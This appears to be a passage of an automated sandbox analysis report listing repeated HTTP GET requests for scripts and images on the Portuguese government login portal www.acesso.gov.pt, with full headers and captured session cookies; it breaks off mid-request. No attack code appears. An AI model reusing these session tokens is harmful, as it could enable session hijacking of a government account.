TS017b475d=01e43c52fec4824682e931aea7dbe99fc0da8ef7a5332311d3b9fc9457150550b8660f940edb60af9b9ebf9d6c66f888962fd17bc6; TSbfdc4c04027=08def0a5edab20002afdebab6ceade4bbf702402da574956e2d3d2603a9f6e2ef0736dc704abc62508639a79311130005df524463572ab5ee183f3a82a1f291d806bcd98f43f85350a9f2f65d995ac995ab16bb6adbac0f0bee883cfe775e1b6
Source: global trafficHTTP traffic detected: GET /autentica_static/img/logo-at.png HTTP/1.1Host: www.acesso.gov.ptConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.acesso.gov.pt/v2/loginForm?partID=PFAPAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ADRUM_BTa=R:0|g:3456e7b1-061b-466c-9917-b4d449a90644|n:customer1_ce667124-ad2e-4cec-9605-d46ab36ccf73; SameSite=None; ADRUM_BT1=R:0|i:26383|e:9; autentica_JSessionID=0yGUWL-tDrpV-dRbYlT4_nilHZq1zq3H66cHGlOgKue8VTFTKq1v!-583688011!-300282855; AT_P=!JOTw1azzUazpv5uXNCYICHCNuUpMadNCTQ1TwzO2BnURPP8ufo7RG9hD0MgwxoP68Hy1JxEt9n0/sLo=; TS017b475d=01e43c52fec4824682e931aea7dbe99fc0da8ef7a5332311d3b9fc9457150550b8660f940edb60af9b9ebf9d6c66f888962fd17bc6; TSbfdc4c04027=08def0a5edab20002afdebab6ceade4bbf702402da574956e2d3d2603a9f6e2ef0736dc704abc62508639a79311130005df524463572ab5ee183f3a82a1f291d806bcd98f43f85350a9f2f65d995ac995ab16bb6adbac0f0bee883cfe775e1b6
Source: global trafficHTTP traffic detected: GET /autentica_static/js/jquery/jquery.validate.min.js?cb=5.2.14 HTTP/1.1Host: www.acesso.gov.ptConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.acesso.gov.pt/v2/loginForm?partID=PFAPAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ADRUM_BTa=R:0|g:3456e7b1-061b-466c-9917-b4d449a90644|n:customer1_ce667124-ad2e-4cec-9605-d46ab36ccf73; SameSite=None; ADRUM_BT1=R:0|i:26383|e:9; autentica_JSessionID=0yGUWL-tDrpV-dRbYlT4_nilHZq1zq3H66cHGlOgKue8VTFTKq1v!-583688011!-300282855; AT_P=!JOTw1azzUazpv5uXNCYICHCNuUpMadNCTQ1TwzO2BnURPP8ufo7RG9hD0MgwxoP68Hy1JxEt9n0/sLo=; TS017b475d=01e43c52fec4824682e931aea7dbe99fc0da8ef7a5332311d3b9fc9457150550b8660f940edb60af9b9ebf9d6c66f888962fd17bc6; TSbfdc4c04027=08def0a5edab20002afdebab6ceade4bbf702402da574956e2d3d2603a9f6e2ef0736dc704abc62508639a79311130005df524463572ab5ee183f3a82a1f291d806bcd98f43f85350a9f2f65d995ac995ab16bb6adbac0f0bee883cfe775e1b6
Source: global trafficHTTP traffic detected: GET /autentica_static/js/jquery/jquery.uniform.min.js?cb=5.2.14 HTTP/1.1Host: www.acesso.gov.ptConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.acesso.gov.pt/v2/loginForm?partID=PFAPAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ADRUM_BTa=R:0|g:3456e7b1-061b-466c-9917-b4d449a90644|n:customer1_ce667124-ad2e-4cec-9605-d46ab36ccf73; SameSite=None; ADRUM_BT1=R:0|i:26383|e:9; autentica_JSessionID=0yGUWL-tDrpV-dRbYlT4_nilHZq1zq3H66cHGlOgKue8VTFTKq1v!-583688011!-300282855; AT_P=!JOTw1azzUazpv5uXNCYICHCNuUpMadNCTQ1TwzO2BnURPP8ufo7RG9hD0MgwxoP68Hy1JxEt9n0/sLo=; TS017b475d=01e43c52fec4824682e931aea7dbe99fc0da8ef7a5332311d3b9fc9457150550b8660f940edb60af9b9ebf9d6c66f888962fd17bc6; TSbfdc4c04027=08def0a5edab20002afdebab6ceade4bbf702402da574956e2d3d2603a9f6e2ef0736dc704abc62508639a79311130005df524463572ab5ee183f3a82a1f291d806bcd98f43f85350a9f2f65d995ac995ab16bb6adbac0f0bee883cfe775e1b6
Source: global trafficHTTP traffic detected: GET /autentica_static/js/smartresize.js?cb=5.2.14 HTTP/1.1Host: www.acesso.gov.ptConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.acesso.gov.pt/v2/loginForm?partID=PFAPAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ADRUM_BTa=R:0|g:3456e7b1-061b-466c-9917-b4d449a90644|n:customer1_ce667124-ad2e-4cec-9605-d46ab36ccf73; SameSite=None; ADRUM_BT1=R:0|i:26383|e:9; autentica_JSessionID=0yGUWL-tDrpV-dRbYlT4_nilHZq1zq3H66cHGlOgKue8VTFTKq1v!-583688011!-300282855; AT_P=!JOTw1azzUazpv5uXNCYICHCNuUpMadNCTQ1TwzO2BnURPP8ufo7RG9hD0MgwxoP68Hy1JxEt9n0/sLo=; TS017b475d=01e43c52fec4824682e931aea7dbe99fc0da8ef7a5332311d3b9fc9457150550b8660f940edb60af9b9ebf9d6c66f888962fd17bc6; TSbfdc4c04027=08def0a5edab20002afdebab6ceade4bbf702402da574956e2d3d2603a9f6e2ef0736dc704abc62508639a79311130005df524463572ab5ee183f3a82a1f291d806bcd98f43f85350a9f2f65d995ac995ab16bb6adbac0f0bee883cfe775e1b6
Source: global trafficHTTP traffic detected: GET /autentica_static/js/modernizr.js?cb=5.2.14 HTTP/1.1Host: www.acesso.gov.ptConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ADRUM_BTa=R:0|g:3456e7b1-061b-466c-9917-b4d449a90644|n:customer1_ce667124-ad2e-4cec-9605-d46ab36ccf73; SameSite=None; ADRUM_BT1=R:0|i:26383|e:9; autentica_JSessionID=0yGUWL-tDrpV-dRbYlT4_nilHZq1zq3H66cHGlOgKue8VTFTKq1v!-583688011!-300282855; AT_P=!JOTw1azzUazpv5uXNCYICHCNuUpMadNCTQ1TwzO2BnURPP8ufo7RG9hD0MgwxoP68Hy1JxEt9n0/sLo=; TS017b475d=01e43c52fec4824682e931aea7dbe99fc0da8ef7a5332311d3b9fc9457150550b8660f940edb60af9b9ebf9d6c66f888962fd17bc6; TSbfdc4c04027=08def0a5edab20002afdebab6ceade4bbf702402da574956e2d3d2603a9f6e2ef0736dc704abc62508639a79311130005df524463572ab5ee183f3a82a1f291d806bcd98f43f85350a9f2f65d995ac995ab16bb6adbac0f0bee883cfe775e1b6
Source: global trafficHTTP traffic detected: GET /autentica_static/js/footer/footer.js?cb=5.2.14 HTTP/1.1Host: www.acesso.gov.ptConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ADRUM_BTa=R:0|g:3456e7b1-061b-466c-9917-b4d449a90644|n:customer1_ce667124-ad2e-4cec-9605-d46ab36ccf73; SameSite=None; ADRUM_BT1=R:0|i:26383|e:9; autentica_JSessionID=0yGUWL-tDrpV-dRbYlT4_nilHZq1zq3H66cHGlOgKue8VTFTKq1v!-583688011!-300282855; AT_P=!JOTw1azzUazpv5uXNCYICHCNuUpMadNCTQ1TwzO2BnURPP8ufo7RG9hD0MgwxoP68Hy1JxEt9n0/sLo=; TS017b475d=01e43c52fec4824682e931aea7dbe99fc0da8ef7a5332311d3b9fc9457150550b8660f940edb60af9b9ebf9d6c66f888962fd17bc6; TSbfdc4c04027=08def0a5edab20002afdebab6ceade4bbf702402da574956e2d3d2603a9f6e2ef0736dc704abc62508639a79311130005df524463572ab5ee183f3a82a1f291d806bcd98f43f85350a9f2f65d995ac995ab16bb6adbac0f0bee883cfe775e1b6
Source: global trafficHTTP traffic detected: GET /autentica_static/img/autenticacaogov.png HTTP/1.1Host: www.acesso.gov.ptConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ADRUM_BTa=R:0|g:3456e7b1-061b-466c-9917-b4d449a90644|n:customer1_ce667124-ad2e-4cec-9605-d46ab36ccf73; SameSite=None; ADRUM_BT1=R:0|i:26383|e:9; autentica_JSessionID=0yGUWL-tDrpV-dRbYlT4_nilHZq1zq3H66cHGlOgKue8VTFTKq1v!-583688011!-300282855; AT_P=!JOTw1azzUazpv5uXNCYICHCNuUpMadNCTQ1TwzO2BnURPP8ufo7RG9hD0MgwxoP68Hy1JxEt9n0/sLo=; TS017b475d=01e43c52fec4824682e931aea7dbe99fc0da8ef7a5332311d3b9fc9457150550b8660f940edb60af9b9ebf9d6c66f888962fd17bc6; TSbfdc4c04027=08def0a5edab20002afdebab6ceade4bbf702402da574956e2d3d2603a9f6e2ef0736dc704abc62508639a79311130005df524463572ab5ee183f3a82a1f291d806bcd98f43f85350a9f2f65d995ac995ab16bb6adbac0f0bee883cfe775e1b6
Source: global trafficHTTP traffic detected: GET /autentica_static/img/iconGovPt_20x20.png HTTP/1.1Host: www.acesso.gov.ptConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ADRUM_BTa=R:0|g:3456e7b1-061b-466c-9917-b4d449a90644|n:customer1_ce667124-ad2e-4cec-9605-d46ab36ccf73; SameSite=None; ADRUM_BT1=R:0|i:26383|e:9; autentica_JSessionID=0yGUWL-tDrpV-dRbYlT4_nilHZq1zq3H66cHGlOgKue8VTFTKq1v!-583688011!-300282855; AT_P=!JOTw1azzUazpv5uXNCYICHCNuUpMadNCTQ1TwzO2BnURPP8ufo7RG9hD0MgwxoP68Hy1JxEt9n0/sLo=; TS017b475d=01e43c52fec4824682e931aea7dbe99fc0da8ef7a5332311d3b9fc9457150550b8660f940edb60af9b9ebf9d6c66f888962fd17bc6; TSbfdc4c04027=08def0a5edab20002afdebab6ceade4bbf702402da574956e2d3d2603a9f6e2ef0736dc704abc62508639a79311130005df524463572ab5ee183f3a82a1f291d806bcd98f43f85350a9f2f65d995ac995ab16bb6adbac0f0bee883cfe775e1b6
Source: global trafficHTTP traffic detected: GET /autentica_static/js/app.js?cb=5.2.14 HTTP/1.1Host: www.acesso.gov.ptConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.acesso.gov.pt/v2/loginForm?partID=PFAPAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ADRUM_BTa=R:0|g:3456e7b1-061b-466c-9917-b4d449a90644|n:customer1_ce667124-ad2e-4cec-9605-d46ab36ccf73; SameSite=None; ADRUM_BT1=R:0|i:26383|e:9; autentica_JSessionID=0yGUWL-tDrpV-dRbYlT4_nilHZq1zq3H66cHGlOgKue8VTFTKq1v!-583688011!-300282855; AT_P=!JOTw1azzUazpv5uXNCYICHCNuUpMadNCTQ1TwzO2BnURPP8ufo7RG9hD0MgwxoP68Hy1JxEt9n0/sLo=; TS017b475d=01e43c52fec4824682e931aea7dbe99fc0da8ef7a5332311d3b9fc9457150550b8660f940edb60af9b9ebf9d6c66f888962fd17bc6; TSbfdc4c04027=08def0a5edab20002afdebab6ceade4bbf702402da574956e2d3d2603a9f6e2ef0736dc704abc62508639a79311130005df524463572ab5ee183f3a82a1f291d806bcd98f43f85350a9f2f65d995ac995ab16bb6adbac0f0bee883cfe775e1b6
Source: global trafficHTTP traffic detected: GET /autentica_static/js/bootstrap/bootstrap-3.3.4.min.js?cb=5.2.14 HTTP/1.1Host: www.acesso.gov.ptConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.acesso.gov.pt/v2/loginForm?partID=PFAPAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ADRUM_BTa=R:0|g:3456e7b1-061b-466c-9917-b4d449a90644|n:customer1_ce667124-ad2e-4cec-9605-d46ab36ccf73; SameSite=None; ADRUM_BT1=R:0|i:26383|e:9; autentica_JSessionID=0yGUWL-tDrpV-dRbYlT4_nilHZq1zq3H66cHGlOgKue8VTFTKq1v!-583688011!-300282855; AT_P=!JOTw1azzUazpv5uXNCYICHCNuUpMadNCTQ1TwzO2BnURPP8ufo7RG9hD0MgwxoP68Hy1JxEt9n0/sLo=; TS017b475d=01e43c52fec4824682e931aea7dbe99fc0da8ef7a5332311d3b9fc9457150550b8660f940edb60af9b9ebf9d6c66f888962fd17bc6; TSbfdc4c04027=08def0a5edab20002afdebab6ceade4bbf702402da574956e2d3d2603a9f6e2ef0736dc704abc62508639a79311130005df524463572ab5ee183f3a82a1f291d806bcd98f43f85350a9f2f65d995ac995ab16bb6adbac0f0bee883cfe775e1b6
Source: global trafficHTTP traffic detected: GET /autentica_static/js/capslock-login.js?cb=5.2.14 HTTP/1.1Host: www.acesso.gov.ptConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.acesso.gov.pt/v2/loginForm?partID=PFAPAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ADRUM_BTa=R:0|g:3456e7b1-061b-466c-9917-b4d449a90644|n:customer1_ce667124-ad2e-4cec-9605-d46ab36ccf73; SameSite=None; ADRUM_BT1=R:0|i:26383|e:9; autentica_JSessionID=0yGUWL-tDrpV-dRbYlT4_nilHZq1zq3H66cHGlOgKue8VTFTKq1v!-583688011!-300282855; AT_P=!JOTw1azzUazpv5uXNCYICHCNuUpMadNCTQ1TwzO2BnURPP8ufo7RG9hD0MgwxoP68Hy1JxEt9n0/sLo=; TS017b475d=01e43c52fec4824682e931aea7dbe99fc0da8ef7a5332311d3b9fc9457150550b8660f940edb60af9b9ebf9d6c66f888962fd17bc6; TSbfdc4c04027=08def0a5edab20002afdebab6ceade4bbf702402da574956e2d3d2603a9f6e2ef0736dc704abc62508639a79311130005df524463572ab5ee183f3a82a1f291d806bcd98f43f85350a9f2f65d995ac995ab16bb6adbac0f0bee883cfe775e1b6
Source: global trafficHTTP traffic detected: GET /autentica_static/js/smartresize.js?cb=5.2.14 HTTP/1.1Host: www.acesso.gov.ptConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ADRUM_BTa=R:0|g:3456e7b1-061b-466c-9917-b4d449a90644|n:customer1_ce667124-ad2e-4cec-9605-d46ab36ccf73; SameSite=None; ADRUM_BT1=R:0|i:26383|e:9; autentica_JSessionID=0yGUWL-tDrpV-dRbYlT4_nilHZq1zq3H66cHGlOgKue8VTFTKq1v!-583688011!-300282855; AT_P=!JOTw1azzUazpv5uXNCYICHCNuUpMadNCTQ1TwzO2BnURPP8ufo7RG9hD0MgwxoP68Hy1JxEt9n0/sLo=; TS017b475d=01e43c52fec4824682e931aea7dbe99fc0da8ef7a5332311d3b9fc9457150550b8660f940edb60af9b9ebf9d6c66f888962fd17bc6; TSbfdc4c04027=08def0a5edab20002afdebab6ceade4bbf702402da574956e2d3d2603a9f6e2ef0736dc704abc62508639a79311130005df524463572ab5ee183f3a82a1f291d806bcd98f43f85350a9f2f65d995ac995ab16bb6adbac0f0bee883cfe775e1b6
Source: global trafficHTTP traffic detected: GET /autentica_static/img/logo-at.png HTTP/1.1Host: www.acesso.gov.ptConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ADRUM_BTa=R:0|g:3456e7b1-061b-466c-9917-b4d449a90644|n:customer1_ce667124-ad2e-4cec-9605-d46ab36ccf73; SameSite=None; ADRUM_BT1=R:0|i:26383|e:9; autentica_JSessionID=0yGUWL-tDrpV-dRbYlT4_nilHZq1zq3H66cHGlOgKue8VTFTKq1v!-583688011!-300282855; AT_P=!JOTw1azzUazpv5uXNCYICHCNuUpMadNCTQ1TwzO2BnURPP8ufo7RG9hD0MgwxoP68Hy1JxEt9n0/sLo=; TS017b475d=01e43c52fec4824682e931aea7dbe99fc0da8ef7a5332311d3b9fc9457150550b8660f940edb60af9b9ebf9d6c66f888962fd17bc6; TSbfdc4c04027=08def0a5edab20002afdebab6ceade4bbf702402da574956e2d3d2603a9f6e2ef0736dc704abc62508639a79311130005df524463572ab5ee183f3a82a1f291d806bcd98f43f85350a9f2f65d995ac995ab16bb6adbac0f0bee883cfe775e1b6
Source: global trafficHTTP traffic detected: GET /autentica_static/js/jquery/jquery.uniform.min.js?cb=5.2.14 HTTP/1.1Host: www.acesso.gov.ptConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ADRUM_BTa=R:0|g:3456e7b1-061b-466c-9917-b4d449a90644|n:customer1_ce667124-ad2e-4cec-9605-d46ab36ccf73; SameSite=None; ADRUM_BT1=R:0|i:26383|e:9; autentica_JSessionID=0yGUWL-tDrpV-dRbYlT4_nilHZq1zq3H66cHGlOgKue8VTFTKq1v!-583688011!-300282855; AT_P=!JOTw1azzUazpv5uXNCYICHCNuUpMadNCTQ1TwzO2BnURPP8ufo7RG9hD0MgwxoP68Hy1JxEt9n0/sLo=; TS017b475d=01e43c52fec4824682e931aea7dbe99fc0da8ef7a5332311d3b9fc9457150550b8660f940edb60af9b9ebf9d6c66f888962fd17bc6; TSbfdc4c04027=08def0a5edab20002afdebab6ceade4bbf702402da574956e2d3d2603a9f6e2ef0736dc704abc62508639a79311130005df524463572ab5ee183f3a82a1f291d806bcd98f43f85350a9f2f65d995ac995ab16bb6adbac0f0bee883cfe775e1b6
Source: global trafficHTTP traffic detected: GET /autentica_static/img/background.png HTTP/1.1Host: www.acesso.gov.ptConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ADRUM_BTa=R:0|g:3456e7b1-061b-466c-9917-b4d449a90644|n:customer1_ce667124-ad2e-4cec-9605-d46ab36ccf73; SameSite=None; ADRUM_BT1=R:0|i:26383|e:9; autentica_JSessionID=0yGUWL-tDrpV-dRbYlT4_nilHZq1zq3H66cHGlOgKue8VTFTKq1v!-583688011!-300282855; AT_P=!JOTw1azzUazpv5uXNCYICHCNuUpMadNCTQ1TwzO2BnURPP8ufo7RG9hD0MgwxoP68Hy1JxEt9n0/sLo=; TS017b475d=01e43c52fec4824682e931aea7dbe99fc0da8ef7a5332311d3b9fc9457150550b8660f940edb60af9b9ebf9d6c66f888962fd17bc6; TSbfdc4c04027=08def0a5edab20002afdebab6ceade4bbf702402da574956e2d3d2603a9f6e2ef0736dc704abc62508639a79311130005df524463572ab5ee183f3a82a1f291d806bcd98f43f85350a9f2f65d995ac995ab16bb6adbac0f0bee883cfe775e1b6
Source: global trafficHTTP traffic detected: GET /autentica_static/js/jquery/jquery.validate.min.js?cb=5.2.14 HTTP/1.1Host: www.acesso.gov.ptConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ADRUM_BTa=R:0|g:3456e7b1-061b-466c-9917-b4d449a90644|n:customer1_ce667124-ad2e-4cec-9605-d46ab36ccf73; SameSite=None; ADRUM_BT1=R:0|i:26383|e:9; autentica_JSessionID=0yGUWL-tDrpV-dRbYlT4_nilHZq1zq3H66cHGlOgKue8VTFTKq1v!-583688011!-300282855; AT_P=!JOTw1azzUazpv5uXNCYICHCNuUpMadNCTQ1TwzO2BnURPP8ufo7RG9hD0MgwxoP68Hy1JxEt9n0/sLo=; TS017b475d=01e43c52fec4824682e931aea7dbe99fc0da8ef7a5332311d3b9fc9457150550b8660f940edb60af9b9ebf9d6c66f888962fd17bc6; TSbfdc4c04027=08def0a5edab20002afdebab6ceade4bbf702402da574956e2d3d2603a9f6e2ef0736dc704abc62508639a79311130005df524463572ab5ee183f3a82a1f291d806bcd98f43f85350a9f2f65d995ac995ab16bb6adbac0f0bee883cfe775e1b6
Source: global trafficHTTP traffic detected: GET /autentica_static/js/jquery/jquery-1.11.1.min.js?cb=5.2.14 HTTP/1.1Host: www.acesso.gov.ptConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ADRUM_BTa=R:0|g:3456e7b1-061b-466c-9917-b4d449a90644|n:customer1_ce667124-ad2e-4cec-9605-d46ab36ccf73; SameSite=None; ADRUM_BT1=R:0|i:26383|e:9; autentica_JSessionID=0yGUWL-tDrpV-dRbYlT4_nilHZq1zq3H66cHGlOgKue8VTFTKq1v!-583688011!-300282855; AT_P=!JOTw1azzUazpv5uXNCYICHCNuUpMadNCTQ1TwzO2BnURPP8ufo7RG9hD0MgwxoP68Hy1JxEt9n0/sLo=; TS017b475d=01e43c52fec4824682e931aea7dbe99fc0da8ef7a5332311d3b9fc9457150550b8660f940edb60af9b9ebf9d6c66f888962fd17bc6; TSbfdc4c04027=08def0a5edab20002afdebab6ceade4bbf702402da574956e2d3d2603a9f6e2ef0736dc704abc62508639a79311130005df524463572ab5ee183f3a82a1f291d806bcd98f43f85350a9f2f65d995ac995ab16bb6adbac0f0bee883cfe775e1b6
Source: global trafficHTTP traffic detected: GET /autentica_static/js/capslock-login.js?cb=5.2.14 HTTP/1.1Host: www.acesso.gov.ptConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ADRUM_BTa=R:0|g:3456e7b1-061b-466c-9917-b4d449a90644|n:customer1_ce667124-ad2e-4cec-9605-d46ab36ccf73; SameSite=None; ADRUM_BT1=R:0|i:26383|e:9; autentica_JSessionID=0yGUWL-tDrpV-dRbYlT4_nilHZq1zq3H66cHGlOgKue8VTFTKq1v!-583688011!-300282855; AT_P=!JOTw1azzUazpv5uXNCYICHCNuUpMadNCTQ1TwzO2BnURPP8ufo7RG9hD0MgwxoP68Hy1JxEt9n0/sLo=; TS017b475d=01e43c52fec4824682e931aea7dbe99fc0da8ef7a5332311d3b9fc9457150550b8660f940edb60af9b9ebf9d6c66f888962fd17bc6; TSbfdc4c04027=08def0a5edab20002afdebab6ceade4bbf702402da574956e2d3d2603a9f6e2ef0736dc704abc62508639a79311130005df524463572ab5ee183f3a82a1f291d806bcd98f43f85350a9f2f65d995ac995ab16bb6adbac0f0bee883cfe775e1b6
Source: global trafficHTTP traffic detected: GET /autentica_static/js/app.js?cb=5.2.14 HTTP/1.1Host: www.acesso.gov.ptConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ADRUM_BTa=R:0|g:3456e7b1-061b-466c-9917-b4d449a90644|n:customer1_ce667124-ad2e-4cec-9605-d46ab36ccf73; SameSite=None; ADRUM_BT1=R:0|i:26383|e:9; autentica_JSessionID=0yGUWL-tDrpV-dRbYlT4_nilHZq1zq3H66cHGlOgKue8VTFTKq1v!-583688011!-300282855; AT_P=!JOTw1azzUazpv5uXNCYICHCNuUpMadNCTQ1TwzO2BnURPP8ufo7RG9hD0MgwxoP68Hy1JxEt9n0/sLo=; TS017b475d=01e43c52fec4824682e931aea7dbe99fc0da8ef7a5332311d3b9fc9457150550b8660f940edb60af9b9ebf9d6c66f888962fd17bc6; TSbfdc4c04027=08def0a5edab20002afdebab6ceade4bbf702402da574956e2d3d2603a9f6e2ef0736dc704abc62508639a79311130005df524463572ab5ee183f3a82a1f291d806bcd98f43f85350a9f2f65d995ac995ab16bb6adbac0f0bee883cfe775e1b6
Source: global trafficHTTP traffic detected: GET /autentica_static/js/bootstrap/bootstrap-3.3.4.min.js?cb=5.2.14 HTTP/1.1Host: www.acesso.gov.ptConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ADRUM_BTa=R:0|g:3456e7b1-061b-466c-9917-b4d449a90644|n:customer1_ce667124-ad2e-4cec-9605-d46ab36ccf73; SameSite=None; ADRUM_BT1=R:0|i:26383|e:9; autentica_JSessionID=0yGUWL-tDrpV-dRbYlT4_nilHZq1zq3H66cHGlOgKue8VTFTKq1v!-583688011!-300282855; 